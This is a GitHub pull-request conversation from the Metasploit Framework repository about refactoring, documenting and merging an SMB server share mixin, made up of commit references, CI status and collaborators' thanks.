@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
da829d9
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
4963992
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
e6ecdde
@jvazquez-r7 jvazquez-r7 locked and limited conversation to collaborators
@jvazquez-r7
Collaborator

I'm locking this pull request because I'm doing changes on the code! I hope to have a new pr later today for you @0x41414141 (other way I'll notify which I'm holded hehe). Just locking it to ensure we don't overlap! I'll unlock once I do a PR back to @0x41414141 with the set of changes I'm working on just now!

@jvazquez-r7
Collaborator

Just an update! I'm working on it still! Started by doing first code cleaning, but figured out hadn't sense do half cleanup without refactor and organize code, fix some logic, etc. So.... I ended up working a lot in the code. I need more time to finish the work. Will keep working on it on monday but I'm super optimistic at this point :) I hope to have a PR ready soon.

I'm working on:

  • Refactoring the current code.
  • Normalizing the requests dispatching logic.
  • Add the necessary templates and support to Rex in order to do better request parsing and response building.
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

First code refactor #3

@jvazquez-r7 jvazquez-r7 unlocked this conversation
@jvazquez-r7
Collaborator

@0x41414141 see 0x41414141#3, all the info in the description in the pull request! Would be helpful if you could review and land :) thanks!

@jvazquez-r7
Collaborator

Thanks @0x41414141 for landing! I've already started the documentation of the current code. I'll add some minor cleanup while documenting, but I hope nothing important. I'm going to lock this PR until I've the doc ready!

@jvazquez-r7 jvazquez-r7 locked and limited conversation to collaborators
@jvazquez-r7 jvazquez-r7 unlocked this conversation
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

Add documentation and specs #4

@jvazquez-r7
Collaborator

@0x41414141 do you mind to check documentation and specs on 0x41414141#4

If it looks good to you, once you land it, I think it's ready to go!

@0x41414141 0x41414141 Merge pull request #4 from jvazquez-r7/review_3074_documentation
Add documentation and specs. All tests pass on my end! Thanks @jvazquez-r7
c7c5270
@jvazquez-r7
Collaborator

Travis is green! Awesome! I plan to land it today so!!! :D

@jvazquez-r7 jvazquez-r7 merged commit c7c5270 into rapid7:master

1 check passed

Details continuous-integration/travis-ci/pr The Travis CI build passed
@jvazquez-r7
Collaborator

w00t! It is landed! :D:D Thanks @0x41414141 for a great collaboration and keeping with us in this long trip :-) Very cool new feature for framework!

@0x41414141

Awesome! Thanks again @jvazquez-r7 for all your hard work on this too! Can't wait to see it in an msfupdate soon!

@hmoore-r7
Owner

@0x41414141 Woohoo! Thanks for your patience!

@Meatballs1 Meatballs1 referenced this pull request
Merged

Nvidia mental ray take 3 #4884

5 of 5 tasks complete
@0x41414141 0x41414141 deleted the 0x41414141:module-smbfileserver branch
Commits on Mar 4, 2015
  1. @0x41414141

    Merge pull request #4 from jvazquez-r7/review_3074_documentation

    0x41414141 authored
    Add documentation and specs. All tests pass on my end! Thanks @jvazquez-r7